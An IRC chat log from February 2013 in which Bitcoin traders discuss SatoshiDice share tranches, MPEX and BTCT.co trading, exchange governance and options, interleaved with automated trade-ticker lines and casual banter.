Feb 05 23:25:31 [HAVELOCK] [SDICE] 4 @ 0.69686969 = 2.7875 BTC [+] Feb 05 23:25:32 [HAVELOCK] [SDICE] 10 @ 0.6969 = 6.969 BTC [+] Feb 05 23:25:34 [HAVELOCK] [SDICE] 67 @ 0.7 = 46.9 BTC [+] Feb 05 23:28:31 [HAVELOCK] [SDICE] 3 @ 0.7 = 2.1 BTC [+] Feb 05 23:29:36 evoorhees: there's no right way to do anything. bravo for trying but i guess people will get mad at something somewhere Feb 05 23:30:46 10000 Amazon Coins are currently worth 1 Bitcoin Gem Feb 05 23:30:51 there's a new tranche coming up? Feb 05 23:34:58 Namworld: go away :P Feb 05 23:35:28 Never! Feb 05 23:35:53 go back to sleep Feb 05 23:35:53 but yes, 1m shares at 10pm EST Feb 05 23:39:37 ok, I'll stick around Feb 05 23:42:41 evoorhees: but it's fact that if you announced yest, you'll get much better price. you see what happens yourself. Feb 05 23:43:16 [MPEX] [S.DICE] 200 @ 0.00677 = 1.354 BTC [-] Feb 05 23:46:22 Well his loss. Feb 05 23:47:16 The way I see it, it's just 5%. Gets him more BTC/USD aside. If SD keeps going like it is, he still got a large %. If it doesn't, he has money put aside. Feb 05 23:47:33 Although he said it might not be his shares Feb 05 23:47:53 Private investors and whatnot. Feb 05 23:48:11 He'll get much better prices until market falls lower. Once we get to the 5th tranche itll be hard to sell at .0055 Feb 05 23:48:28 but itll be interesting to see how this all unfolds Feb 05 23:48:58 I am not sure it will be that hard. Plus next one should be higher still Feb 05 23:48:59 have you seen http://blockchain.info/address/1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx ? Feb 05 23:49:14 Yes, lots of deposits Feb 05 23:49:17 there's queued money for 2nd tranche already Feb 05 23:49:25 fully Feb 05 23:49:41 actually i can see why i'm wrong Feb 05 23:49:48 the dividend promise is still high Feb 05 23:49:58 and working on 3rd tranche Feb 05 23:50:44 oh i actually meant "next 3 tranches are filled by these deposits" Feb 05 23:50:58 or 2 at least Feb 05 23:51:00 wow Feb 05 23:52:53 ah hello everyone Feb 05 23:55:13 ^^ imbodied innocence Feb 05 23:55:35 jurov, most of these funds were already there before the S.DICE planned slices Feb 05 23:55:44 They might be tied in options and whatnot Feb 05 23:56:33 Namworld, click on the icon in in Final Balance row, right above "Donation Button" Feb 05 23:56:48 and behold the spike in balance graph Feb 05 23:57:03 10k Feb 05 23:57:30 *yawn Feb 05 23:57:44 yeah, so? Feb 05 23:57:46 [MPEX] [S.MPOE] 2764 @ 0.00069778 = 1.9287 BTC [+] Feb 05 23:57:48 [MPEX] [S.MPOE] 7694 @ 0.00069744 = 5.3661 BTC [-] Feb 05 23:57:49 [MPEX] [S.MPOE] 3950 @ 0.00069567 = 2.7479 BTC [-] Feb 05 23:58:18 nam Feb 05 23:58:26 since MP did the last deposit processing Feb 05 23:58:29 hey btcland Feb 05 23:58:32 there are now over 7,000 btc Feb 05 23:58:35 waiting for deposit Feb 05 23:58:48 [MPEX] [S.MPOE] 10000 @ 0.00069092 = 6.9092 BTC [-] Feb 05 23:59:10 ready for tonight ? http://imgur.com/tCp90.gif Feb 05 23:59:19 for the shares? Feb 05 23:59:33 I felt so bad I so the shares went from 9k to 0 Feb 05 23:59:34 lol Feb 06 00:00:16 *900k Feb 06 00:01:15 DEPOSITS CREDITED Feb 06 00:01:47 yeah deposit flusht Feb 06 00:04:32 [MPEX] [S.MPOE] 9825 @ 0.00069092 = 6.7883 BTC [-] Feb 06 00:04:53 well, isn't it late to make some bet? Feb 06 00:05:01 sooo, next s.dice block going up soon or ? Feb 06 00:05:09 [MPEX] [S.MPOE] 25100 @ 0.00069066 = 17.3356 BTC [-] Feb 06 00:05:11 [MPEX] [S.MPOE] 15000 @ 0.00069061 = 10.3592 BTC [-] Feb 06 00:05:11 [MPEX] [S.MPOE] 11750 @ 0.00068988 = 8.1061 BTC [-] Feb 06 00:05:13 [MPEX] [S.MPOE] 3500 @ 0.00068592 = 2.4007 BTC [-] Feb 06 00:05:16 [MPEX] [S.MPOE] 20000 @ 0.00068591 = 13.7182 BTC [-] Feb 06 00:05:17 yea, evoorhees said he's waiitgn for you Feb 06 00:05:17 [MPEX] [S.MPOE] 27114 @ 0.00068589 = 18.5972 BTC [-] Feb 06 00:05:18 [MPEX] [S.MPOE] 12523 @ 0.00068201 = 8.5408 BTC [-] Feb 06 00:05:20 [MPEX] [S.MPOE] 7088 @ 0.00068 = 4.8198 BTC [-] Feb 06 00:05:21 [MPEX] [S.MPOE] 13650 @ 0.0006789 = 9.267 BTC [-] Feb 06 00:05:22 [MPEX] [S.MPOE] 15122 @ 0.0006785 = 10.2603 BTC [-] Feb 06 00:05:24 [MPEX] [S.MPOE] 2600 @ 0.00067662 = 1.7592 BTC [-] Feb 06 00:05:25 [MPEX] [S.MPOE] 7100 @ 0.0006764 = 4.8024 BTC [-] Feb 06 00:05:26 [MPEX] [S.MPOE] 20000 @ 0.00067511 = 13.5022 BTC [-] Feb 06 00:05:28 [MPEX] [S.MPOE] 20000 @ 0.0006751 = 13.502 BTC [-] Feb 06 00:05:30 [MPEX] [S.MPOE] 11050 @ 0.00067435 = 7.4516 BTC [-] Feb 06 00:05:32 [MPEX] [S.MPOE] 11400 @ 0.00067406 = 7.6843 BTC [-] Feb 06 00:05:32 evoorhees been waitin' long ? Feb 06 00:05:33 [MPEX] [S.MPOE] 11400 @ 0.00067283 = 7.6703 BTC [-] Feb 06 00:05:41 [MPEX] [S.MPOE] 10000 @ 0.0006726 = 6.726 BTC [-] Feb 06 00:05:45 hey can we just put them on sale now? Feb 06 00:05:48 [MPEX] [S.MPOE] 5334 @ 0.00067034 = 3.5756 BTC [-] Feb 06 00:05:49 that would be fun Feb 06 00:05:51 LOL Feb 06 00:06:03 next tranche goes live at 10pm EST Feb 06 00:06:11 what time est is it nao ? Feb 06 00:06:16 5:06 Feb 06 00:06:24 it's 4am CET Feb 06 00:06:27 so then he wasn't waiting for me lol Feb 06 00:06:46 what will tranche 3, 4, 5 sell for??? Feb 06 00:06:51 if you wouldn't show, he wanted to wait Feb 06 00:06:57 this is important for strat Feb 06 00:07:16 evoorhees don't say Feb 06 00:07:34 anything exciting happen in the meanwhile ? Feb 06 00:07:37 they'll sell only for Amazon Coins Feb 06 00:07:41 I'm switching systems Feb 06 00:10:39 [BTCTC] [MININGCO.ETF] 2 @ 0.5198 = 1.0396 BTC [+] Feb 06 00:11:39 !ticker m s.mpoe Feb 06 00:11:41 [MPEX:S.MPOE] 1D: 0.00067034 / 0.00069117 / 0.0007 (1551506 shares, 1,072.36 BTC), 7D: 0.00063598 / 0.00067519 / 0.0007 (14828567 shares, 10,012.20 BTC), 30D: 0.00059445 / 0.00066099 / 0.0007 (60849659 shares, 40,221.23 BTC) Feb 06 00:15:41 what price is the next dice dump? Feb 06 00:15:49 0.0055 Feb 06 00:16:30 o, was it announced ? Feb 06 00:16:33 ya Feb 06 00:16:40 cool. Feb 06 00:16:45 prolly better like this. Feb 06 00:17:08 def higher ave price Feb 06 00:17:28 [BTCTC] [COGNITIVE] 3 @ 0.33 = 0.99 BTC [+] Feb 06 00:17:46 !ticker m s.dice Feb 06 00:17:47 [MPEX:S.DICE] 1D: 0.0042 / 0.00451812 / 0.00739498 (1015673 shares, 4,588.94 BTC), 7D: 0.0042 / 0.00562248 / 0.007395 (1691227 shares, 9,508.89 BTC), 30D: 0.00085848 / 0.00508174 / 0.0075 (6878960 shares, 34,957.14 BTC) Feb 06 00:17:52 announcement: https://bitcointalk.org/index.php?topic=101902.msg1505462#msg1505462 Feb 06 00:17:56 evoorhees you should actually sell at .0046.... Market will sell thru about .0055 anyway Feb 06 00:17:59 above Feb 06 00:18:06 maybe he doesn't want to lose the .9 Feb 06 00:18:12 he wont Feb 06 00:18:18 bids will be up Feb 06 00:18:22 above .0055 Feb 06 00:18:24 this time Feb 06 00:18:27 a that's a point yeah. Feb 06 00:18:33 jurov had a funny idea Feb 06 00:18:37 which is interesting Feb 06 00:18:51 sell small blocks at random prices Feb 06 00:18:56 like S.BBET IPO Feb 06 00:19:02 those weren't random at all tho Feb 06 00:19:05 but random price within a range Feb 06 00:19:10 and yeah, i think it was a pretty decent model. Feb 06 00:19:19 do not announce the range Feb 06 00:19:50 I wonder how the dynamics would be different from the S.BBET IPO Feb 06 00:20:07 prolly worth doing as a test if anyone wants to. Feb 06 00:20:10 and it would be fitting for online casino Feb 06 00:20:36 heh Feb 06 00:21:42 [BTCTC] [GSDPT] 1 @ 0.0058 BTC [-] Feb 06 00:29:26 mircea im being a good owl Feb 06 00:30:52 ::bc,stats Feb 06 00:30:55 hehe good for you. Feb 06 00:31:06 ;;bc,stats Feb 06 00:31:08 Current Blocks: 219815 | Current Difficulty: 3275464.5865656 | Next Difficulty At Block: 221759 | Next Difficulty In: 1944 blocks | Next Difficulty In About: 1 week, 5 days, 12 hours, 14 minutes, and 24 seconds | Next Difficulty Estimate: 3586919.51025840 | Estimated Percent Change: 9.50872511247 Feb 06 00:31:32 will see if interest remains 2 more days ! Feb 06 00:31:34 owl lol Feb 06 00:31:44 yes are u bear? Feb 06 00:31:48 I'm turning into a hawk, actually Feb 06 00:31:51 an opportunist Feb 06 00:31:59 i c Feb 06 00:32:34 oh no dont eat me Feb 06 00:32:47 right now im an owl, but when shit happens, ill make my move Feb 06 00:33:09 i think its permanent for me Feb 06 00:33:18 why cant i see the buy orders for dice? Feb 06 00:33:22 i only see 10k Feb 06 00:33:24 seems paltry Feb 06 00:33:40 still early? Feb 06 00:33:44 maybe ppl don't want you gawking at their orders Feb 06 00:33:45 lol looks like everyone is waiting with the orders... Feb 06 00:33:48 i wanna be around for the tears though Feb 06 00:34:19 last nite havelock had some silent tears Feb 06 00:34:43 tears of unfathomable sadness.. Feb 06 00:34:53 secret ingredient to the most delicious chili Feb 06 00:35:07 i think its chili Feb 06 00:39:11 so basically s.mpoe got sold off by people who wanted cash at the ready for s.dice Feb 06 00:39:20 the monetization of s.mpoe, this is what it is. Feb 06 00:40:49 dice appears to be doing well today too Feb 06 00:40:59 not that it measn anything tomorrow Feb 06 00:41:34 whats a decent amount of bitcoins to have for a stash? Feb 06 00:41:45 http://www.youtube.com/watch?v=bU6m5UqLx9M Feb 06 00:41:48 ahahaha this is great Feb 06 00:41:53 10000-100000 Feb 06 00:42:19 i will take something far under that, minus a zero or 2 Feb 06 00:42:22 heh Feb 06 00:42:28 dice is killin it today Feb 06 00:42:37 esp if btc reach 100 bucks ea Feb 06 00:42:42 yeah take a couple of zeroes Feb 06 00:43:15 anyone seen keefe of late ? Feb 06 00:43:38 few days ago Feb 06 00:45:38 i see bitcoin going down to 10bucks Feb 06 00:45:47 thats when ill get 100 : D Feb 06 00:45:50 that wouldn't hurt. Feb 06 00:46:18 everything is so much better at $10 Feb 06 00:46:44 nah Feb 06 00:46:47 its better at 100 Feb 06 00:47:01 the bills are crisper Feb 06 00:47:04 way too much even for alt money Feb 06 00:50:18 ;;bc,stats Feb 06 00:50:20 Current Blocks: 219817 | Current Difficulty: 3275464.5865656 | Next Difficulty At Block: 221759 | Next Difficulty In: 1942 blocks | Next Difficulty In About: 1 week, 5 days, 14 hours, 37 minutes, and 42 seconds | Next Difficulty Estimate: 3548829.64104848 | Estimated Percent Change: 8.34584063598 Feb 06 00:50:21 the way the shit is going the dollar doesn't have a prayer. it will just keep tumbling against btc Feb 06 00:51:44 someone should start bitcoin university, i could make a great TA Feb 06 00:51:57 can someone explain, so will there be additional s.dice dumps beyond the 1m at 0.0055? Feb 06 00:52:04 [MPEX] [S.MPOE] 9850 @ 0.00069092 = 6.8056 BTC [+] Feb 06 00:52:23 gesell erik said 3 more for now Feb 06 00:52:29 yes, 3 more dumps over 0.0055 Feb 06 00:52:46 and jurov said something about the first dump being already fulfilled? Feb 06 00:52:59 it got filled within minutes of deposits clearing yes Feb 06 00:53:24 but that volume doesnt appear on the order book, or? Feb 06 00:53:37 volume never appears on the order book. Feb 06 00:53:41 volume appears on the ticker tape Feb 06 00:53:55 did i miss it, didnt see it from assbod Feb 06 00:53:57 assbot Feb 06 00:54:02 hmm Feb 06 00:54:05 somebody quoted it recently. Feb 06 00:54:15 lost my connection i guess Feb 06 00:54:15 whats a good program to quickly drag-drop an area of the desktop to screenshot ? Feb 06 00:54:48 press prtscrn ? Feb 06 00:55:10 was looking for somethign similar Feb 06 00:55:19 activate system tray program, and drag a box Feb 06 00:55:24 and it just copies that area into clipboard Feb 06 00:56:02 a Feb 06 00:56:24 ahh Feb 06 00:56:26 windows has it built in Feb 06 00:56:27 snipping tool Feb 06 00:58:01 jurov: what did you mean "(22:51:14) jurov: oh i actually meant "next 3 tranches are filled by these deposits"? Feb 06 00:58:43 gesell, i meant that 10k of deposits is enough to buy them Feb 06 00:58:53 then i fixed myself, two of them Feb 06 00:59:09 basically i think a number of people realised that keeping funds in random places is useless and stupid Feb 06 00:59:10 [MPEX] [S.MPOE] 4321 @ 0.00067313 = 2.9086 BTC [-] Feb 06 00:59:17 since you risk missing out on deals for no upside. Feb 06 00:59:17 [MPEX] [S.MPOE] 2840 @ 0.0006728 = 1.9108 BTC [-] Feb 06 00:59:27 it's not necessarily all of it goes to s.dice buys Feb 06 01:00:43 what else... ? Feb 06 01:00:45 "No, I have an update coming. We are running a very tight timeline, so getting specific dates is difficult as the whole process is fairly fluid at the moment." Feb 06 01:00:51 inaba is a comedy goldmine Feb 06 01:01:11 very tight and fluid, his asshole & headspace. Feb 06 01:02:16 waat Feb 06 01:02:31 somebody is going to clean out on that bfl delivery bet Feb 06 01:02:36 and it ain't gonna be gigavps. Feb 06 01:03:26 also, http://www.amazonappstoredev.com/2013/02/introducing-amazon-coins.html Feb 06 01:03:32 amazon is so much fail lol Feb 06 01:04:01 i dont get you mircea... Feb 06 01:04:14 which part ? Feb 06 01:04:33 im stuck on asshole &headspace lol Feb 06 01:05:35 there's this nobody on the forums, trolling for a bullshit company peddling some vaporware that has a bunch of gigavps' money. Feb 06 01:05:44 he's making a fool of himself on a biweekly basis. Feb 06 01:06:10 he might have an interesting story Feb 06 01:06:22 no Feb 06 01:07:06 he might Feb 06 01:08:07 he doesn't Feb 06 01:08:25 but but he might! Feb 06 01:08:53 aww everyone has a story Feb 06 01:09:06 i wanna hear em all :D Feb 06 01:09:14 truffles give it six months. everyone's story floats to the surface. Feb 06 01:09:22 tom's recent float was funny. Feb 06 01:09:40 i dunno if id make a week in this place Feb 06 01:09:54 long periods of silence.. Feb 06 01:09:56 should i go to bed and leave my small order on the books for the next tranche or do i have to stay awake? Feb 06 01:10:29 the orders don't process if you aren't watching them Feb 06 01:10:46 gesell real traders don't sleep. Feb 06 01:10:56 yes, i have seen that with my own eyes! Feb 06 01:11:19 pigeon on a roll Feb 06 01:11:40 too many carbs Feb 06 01:12:15 gesell what are you placing it at? Feb 06 01:12:38 sounds like its time to unveil IPObot Feb 06 01:13:08 i can keep an eye on things, i cant sleep Feb 06 01:13:25 1st two days free Feb 06 01:15:10 omg at this thai discussion.. Feb 06 01:23:44 [MPEX] [S.DICE] 200 @ 0.00676999 = 1.354 BTC [-] Feb 06 01:38:25 Namworld: what's up with the btct.co "TRADING HAS BEEN HALTED ON S.MPOE BY THE ISSUER." ? Feb 06 01:41:46 Oh, I accidentally hit the halt trading checkbox I think Feb 06 01:41:55 I realized it was checked at some point and unchecked it. Feb 06 01:42:07 accidentaly switched off the matrix sry. Feb 06 01:45:37 [MPEX] [S.MPOE] 17933 @ 0.0006728 = 12.0653 BTC [-] Feb 06 01:45:39 [MPEX] [S.MPOE] 3014 @ 0.00067279 = 2.0278 BTC [-] Feb 06 01:47:57 lol Feb 06 01:56:42 [MPEX] [S.MPOE] 12317 @ 0.00067279 = 8.2868 BTC [-] Feb 06 01:56:44 [MPEX] [S.MPOE] 583 @ 0.00066962 = 0.3904 BTC [-] Feb 06 02:06:57 Namworld: : tossed up a first bids for bvps :) Feb 06 02:07:08 not much.. but its all I had left after sending btc for sdice LOL Feb 06 02:07:18 in fact its horribly small LOL Feb 06 02:08:08 ah, yeah Feb 06 02:08:10 thanks Feb 06 02:08:28 when I can get more btc in, I'll up it Feb 06 02:08:31 I could theorically sell shares I have on MPEx, but technically no one is moved yet Feb 06 02:08:34 cause its seriously undervaluing bvps Feb 06 02:08:45 and I don't want to start trading before people start getting moved Feb 06 02:09:08 prolly a good idea. Feb 06 02:09:09 thats alright, just wanted to give it a little something for now. Feb 06 02:09:50 [MPEX] [S.MPOE] 4850 @ 0.00068646 = 3.3293 BTC [+] Feb 06 02:10:20 Well people can place bids while waiting. Since you can use the same funds on multiple bids on BTCT.co Feb 06 02:12:47 hey jurov Feb 06 02:12:50 are you here? Feb 06 02:13:00 yes Feb 06 02:13:11 cool, i transferred some btc over to coinbr Feb 06 02:13:30 would it be too much trouble to get it in before the second block of shares is released? Feb 06 02:13:39 i mean of course after it is verified Feb 06 02:13:45 if it is, i understand Feb 06 02:13:46 *poitns to the queue* Feb 06 02:14:06 The fifth block is gonna have to sell at .0046 again Feb 06 02:14:12 where is the queue? Feb 06 02:14:30 just joking, it's not a problem atm Feb 06 02:14:48 maybe i already processed you if your tx is confirmed Feb 06 02:15:25 ;;tslb Feb 06 02:15:29 Time since last block: 21 minutes and 6 seconds Feb 06 02:15:35 ;;ticker Feb 06 02:15:35 BTCUSD ticker | Best bid: 20.75000, Best ask: 20.77999, Bid-ask spread: 0.02999, Last trade: 20.77999, 24 hour volume: 29165.33433872, 24 hour low: 20.20000, 24 hour high: 20.79000, 24 hour vwap: 20.57350 Feb 06 02:17:40 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 06 02:17:59 @bug, i saw 0.0028 Feb 06 02:18:22 or mabye 0.00058 Feb 06 02:18:29 0.0008 Feb 06 02:18:37 [MPEX] [S.MPOE] 7700 @ 0.00068748 = 5.2936 BTC [+] Feb 06 02:18:39 [MPEX] [S.MPOE] 3300 @ 0.00068936 = 2.2749 BTC [+] Feb 06 02:18:47 we can troll all the night Feb 06 02:22:30 [MPEX] [S.MPOE] 2850 @ 0.00068646 = 1.9564 BTC [-] Feb 06 02:22:32 [MPEX] [S.MPOE] 3443 @ 0.00066987 = 2.3064 BTC [-] Feb 06 02:24:21 at this rate Feb 06 02:24:28 shares will not sell at 0.0055 Feb 06 02:24:36 will be at 0.0065+ Feb 06 02:25:59 this is the best way tho, let market decide. Feb 06 02:28:01 why cant market decide 0.001 Feb 06 02:28:25 market hates you Feb 06 02:28:45 its fine i dont have a place in my heart for it Feb 06 02:30:19 [MPEX] [S.MPOE] 13307 @ 0.00066987 = 8.914 BTC [-] Feb 06 02:30:21 [MPEX] [S.MPOE] 8493 @ 0.00066962 = 5.6871 BTC [-] Feb 06 02:31:21 maybe i'll sit this one out Feb 06 02:37:05 [MPEX] [S.MPOE] 2000 @ 0.00068865 = 1.3773 BTC [+] Feb 06 02:39:02 https://bitcointalk.org/index.php?topic=138047.msg1505179#msg1505179 Feb 06 02:48:03 [MPEX] [S.MPOE] 19000 @ 0.00067717 = 12.8662 BTC [-] Feb 06 02:52:49 [BTCTC] [MININGCO.ETF] 3 @ 0.5198 = 1.5594 BTC [+] Feb 06 02:55:01 [MPEX] [S.DICE] 800 @ 0.00652743 = 5.2219 BTC [-] Feb 06 02:55:27 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1211 BTC [+] Feb 06 02:55:32 [HAVELOCK] [SDICE] 1 @ 0.735 BTC [+] Feb 06 02:55:59 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1212 BTC [+] Feb 06 02:57:32 [HAVELOCK] [SDICE] 1 @ 0.64 BTC [-] Feb 06 02:59:11 kakobrekla http://trilema.com/2013/lets-understand-mutual-betting-together/ Feb 06 02:59:34 and also for the lulz http://rt.com/usa/news/doj-sp-us-rating-497/ Feb 06 03:03:52 fucking romanians: https://bitcointalk.org/index.php?topic=141311.0;all Feb 06 03:04:17 Text: The Unit what we offer to You contains Feb 06 03:04:20 clear scam. Feb 06 03:10:49 [MPEX] [S.MPOE] 3131 @ 0.00067717 = 2.1202 BTC [-] Feb 06 03:10:51 [MPEX] [S.MPOE] 14333 @ 0.00066962 = 9.5977 BTC [-] Feb 06 03:12:15 mircea_popescu: will you ever allow public voting rights for mpoe common stock or do you have another administration in mind? Feb 06 03:12:27 nope. Feb 06 03:12:35 voting has no use, place or value in btc. Feb 06 03:13:10 why not? what if investors want operating control as a part of their investment. Feb 06 03:13:24 btc is not based on imposing control. Feb 06 03:13:30 btc is a voluntary system. Feb 06 03:13:46 people can want whatever they want to want, but they will always get what the system is designed to give. Feb 06 03:14:18 one could say the same linux or other contributions but ultimately you control which patches go into mpex Feb 06 03:14:28 that has nothing to do with anything. Feb 06 03:14:34 why not? Feb 06 03:14:42 you will never be able to control what the asset owner does. Feb 06 03:14:45 if you can persuade them, fine Feb 06 03:14:46 stop making me agree with mircea_popescu Feb 06 03:14:49 if you can't, you don't have a point. Feb 06 03:14:54 [MPEX] [S.MPOE] 1021 @ 0.00067752 = 0.6917 BTC [+] Feb 06 03:14:56 [MPEX] [S.MPOE] 11080 @ 0.00067777 = 7.5097 BTC [+] Feb 06 03:15:37 [HAVELOCK] [SDICE] 9 @ 0.735 = 6.615 BTC [+] Feb 06 03:15:41 [HAVELOCK] [SDICE] 6 @ 0.749 = 4.494 BTC [+] Feb 06 03:15:46 [HAVELOCK] [SDICE] 1 @ 0.7525 BTC [+] Feb 06 03:15:47 that sounds like something kanye would say... Feb 06 03:15:54 who's that ? Feb 06 03:16:09 Lol Feb 06 03:16:26 your model of control is similar to someone else that recently ipo'ed Feb 06 03:16:32 facebook... Feb 06 03:16:33 Imma let u finish... Feb 06 03:16:52 i don't see the similarity to fb ? Feb 06 03:17:02 Facebook is a textbook example of perfect IPO Feb 06 03:17:12 Bugpowder nah, it oversold. way, way oversold. Feb 06 03:17:15 shittiest ipo in history. Feb 06 03:17:22 Maximized The money Feb 06 03:17:24 mark zukcerberg will always have majority control of the company Feb 06 03:17:27 that's not good. Feb 06 03:17:34 It is good for fb Feb 06 03:17:42 Not for underwriters Feb 06 03:17:46 he owns a separate type of stock that gives him 4x more voting power Feb 06 03:17:49 nope. it's good for a few investment bankers and maybe zuckerberg Feb 06 03:17:56 problem is they made hot money, which will likely killthem Feb 06 03:18:01 but for fb, it is horrid. Feb 06 03:18:03 Disagree Feb 06 03:18:10 no company ever survives an oversold ipo Feb 06 03:18:14 it hasn't happened yet. Feb 06 03:18:23 FB will be the first. Feb 06 03:18:26 it's better to undersell it, that you can survive. Feb 06 03:19:09 Agree for vc rounds Feb 06 03:19:12 Not IPO Feb 06 03:19:14 my point though was that no matter how much common stock you issue Feb 06 03:19:29 well, these are points that will be argued for eons to come. Feb 06 03:19:30 you will have complete control of mpex direction Feb 06 03:19:50 Did s.bbet get oversold? Feb 06 03:19:52 thestringpuller yeah. untill i sell the golden share i will. Feb 06 03:20:00 Bugpowder i have no idea. i think prolly not. Feb 06 03:20:02 what golden share? Feb 06 03:20:26 well it's what it is, practically. whoever is owner has 50% + the voting share. Feb 06 03:20:47 like the willy wonka golden ticket? do i get to visit the mpex factory too? Feb 06 03:20:52 lol Feb 06 03:24:56 mpex does offer more freedom than most exchanges Feb 06 03:27:37 I'm glad my joke was well taken. Feb 06 03:30:33 [HAVELOCK] [SDICE] 10 @ 0.745 = 7.45 BTC [-] Feb 06 03:30:35 [HAVELOCK] [SDICE] 1 @ 0.75 BTC [+] Feb 06 03:30:36 [HAVELOCK] [SDICE] 3 @ 0.7525 = 2.2575 BTC [+] Feb 06 03:30:37 [HAVELOCK] [SDICE] 1 @ 0.7549 BTC [+] Feb 06 03:31:02 naaah. I'll wait until I get some good vol on BF first Feb 06 03:31:02 ;) Feb 06 03:31:16 should list it on MPEX out of amusement Feb 06 03:31:38 [MPEX] [S.MPOE] 4321 @ 0.00067109 = 2.8998 BTC [-] Feb 06 03:31:38 see if other exchanges do a PT >:D Feb 06 03:32:14 how many total exchanges? Feb 06 03:32:22 how many stars are there? Feb 06 03:32:29 everyone has an exchange nowdays Feb 06 03:32:33 no way Feb 06 03:32:41 i dunno.. 6? 8? Feb 06 03:32:45 depends on how you define exchange Feb 06 03:32:46 oh lol Feb 06 03:32:54 was gonna say no way theyre all legit Feb 06 03:32:55 do you include colored coins ? Feb 06 03:32:59 lol pt to bf's listing on mpex ? Feb 06 03:33:12 mircea_popescu: jsut sidce Feb 06 03:33:19 terra has a bbet one that hasnt been enabled yet Feb 06 03:33:24 was debating mpoe myself Feb 06 03:33:34 no i meant, you lisrt bf on mpex end up with pt's on btct or w./e Feb 06 03:33:41 was just laughing in amusment of the idea of listing BF on mpex, and then other exchanges doing a PT supporting it. LOL Feb 06 03:33:46 right. Feb 06 03:33:48 yeah Feb 06 03:33:52 how funny would that be Feb 06 03:33:52 :P Feb 06 03:34:03 going through one exchange, to PT to otherse Feb 06 03:34:04 :P Feb 06 03:34:11 FROM an exchange Feb 06 03:34:28 BF has had a good intake the last 30days Feb 06 03:34:40 bf boyfriend to pt personal tanner? Feb 06 03:34:52 pt poon tang Feb 06 03:34:54 You have issues. :P Feb 06 03:35:25 Ukyo had good intake Feb 06 03:35:45 thats a good one Feb 06 03:37:00 http://polimedia.us/dtng/c/src/128223577335.jpg Feb 06 03:37:03 she has even better intake Feb 06 03:37:52 hi all Feb 06 03:38:08 that looks tiny Feb 06 03:38:17 [MPEX] [S.MPOE] 8291 @ 0.00067107 = 5.5638 BTC [-] Feb 06 03:38:18 http://www.bitcoinforum.com/mining-discussion/107-units-with-85-ghs-are-ready-for-shipping/ Feb 06 03:38:19 [MPEX] [S.MPOE] 2488 @ 0.00067777 = 1.6863 BTC [+] Feb 06 03:38:20 [MPEX] [S.MPOE] 8221 @ 0.00068017 = 5.5917 BTC [+] Feb 06 03:38:21 this shit's so funny. Feb 06 03:38:28 truffles the guy ? yeah. Feb 06 03:38:34 finally got some MPOE mircea Feb 06 03:38:50 mircea_popescu: Would it be possible, (and desirable from your pov) to include something like 'STAT|S.MPOE' to the exchange? Feb 06 03:39:25 it's been being discussed so to speak. Feb 06 03:39:51 Nice Feb 06 03:39:52 what utility to you see for it ? Feb 06 03:40:16 It would be handy for brokers Feb 06 03:40:22 yeah, Feb 06 03:40:33 the original concept would be that somebody would be making a verify-only account Feb 06 03:40:35 would it be a stat for mpoe (what is mpoe's bid ask last) or a stat for you, relating to mpoe (how many shares, avg price) Feb 06 03:40:39 as a sort of escrow of sorts Feb 06 03:40:47 people could push assets to it, it'd get a stat and push them back Feb 06 03:40:52 sort of like a 3rd party service Feb 06 03:41:02 that was the concept, back whenever, spring 2012. Feb 06 03:41:24 They need to mispell customers as costumers to make the scan legit Feb 06 03:41:26 Nice concept Feb 06 03:41:32 Scam Feb 06 03:41:40 now, it hasn't happened yet, i'm either way about whether it should be fixed forcibly Feb 06 03:42:16 Well, I'm sure you'll come up with the best possible way ;) Feb 06 03:42:29 oh and i just remembered the open interest request for options Feb 06 03:42:36 but i thought originally this "problem" (ie, no single stock stat) would allow a nice niche for a sort of s&p, moody, fitch equuivalent to fill and grow Feb 06 03:43:11 my primary goal is to build a btc finance space, and so there's all sorts of "broken" things like that deliberately to let people solve problems and grow an ecosystem Feb 06 03:43:32 Yeah, it's ok Feb 06 03:43:33 but that aside, it IS starting to become a problem, so... Feb 06 03:43:42 still waffling on the subject. Feb 06 03:43:52 Just put strong fundations, and let people build over it Feb 06 03:44:18 i'm glad you are leaving lots of room for creativity Feb 06 03:44:24 i think it will grow very nicely Feb 06 03:44:27 [MPEX] [S.MPOE] 4321 @ 0.00067987 = 2.9377 BTC [-] Feb 06 03:44:29 [MPEX] [S.MPOE] 3729 @ 0.00068017 = 2.5364 BTC [+] Feb 06 03:44:30 so far indeed it has, Feb 06 03:44:40 and a lot of people have been putting in a lot of work, learning a lot in the process Feb 06 03:44:47 and amassing a lot of valuable knowledge/experience Feb 06 03:44:51 i was thinking that the guy who created coinsforpizza should start something similar for freshdirect Feb 06 03:45:02 to finally answer the "can i buy groceries with it" question Feb 06 03:45:10 since pizza was a great first step Feb 06 03:45:15 somebody was complaining to me that they can't buy anon Feb 06 03:45:29 huh? on that site? Feb 06 03:45:32 ya Feb 06 03:45:35 how would they deliver it? Feb 06 03:45:38 i have no idea. Feb 06 03:45:46 mircea_popescu, can mpoe report open interest? i think it's just counting all extant options Feb 06 03:45:46 was kinda funny concept to me :D Feb 06 03:45:56 yeah Feb 06 03:46:00 ninja turtles style lol Feb 06 03:46:01 jurov it could but it doesn't want to. Feb 06 03:46:10 why? Feb 06 03:46:20 [MPEX] [S.MPOE] 7700 @ 0.00068017 = 5.2373 BTC [+] Feb 06 03:46:44 well, because everyone is already fully covered, so it's not a matter of evaluating cp risk that'd be helped Feb 06 03:46:51 and i don't want to provide the momentum trading signal. Feb 06 03:46:52 that's the thing too, i really think that people have to see it as a tool, you can use cash anonymously in the real world, but you could also use cash in a very open way. Feb 06 03:48:15 jurov: one more question Feb 06 03:48:43 do you need collateral to buy an option? or was that requirement just for selling them? Feb 06 03:49:07 it's needed only for creating them. that's different from buying Feb 06 03:49:48 so far i'm doing creating by MKOPT/SPLIT manually on request, there wasn't much interest Feb 06 03:50:26 mjr_ collateral to buy an option ? no, you don't you can't lose anything by buying one. Feb 06 03:52:03 that is what i figured Feb 06 03:52:22 but i was just checking, because i thought people were saying you needed collateral in all cases Feb 06 03:52:34 nah, only if you sell em. Feb 06 03:52:41 you alive bud? Feb 06 03:52:47 and upon expiration, you just do a bitcoin settlement...is that automatic? Feb 06 03:52:55 ywa Feb 06 03:52:58 cool cool Feb 06 03:53:15 you can exercise them manually too Feb 06 03:53:25 exercise? whats that? >,> Feb 06 03:53:33 make them expire Feb 06 03:53:37 when you 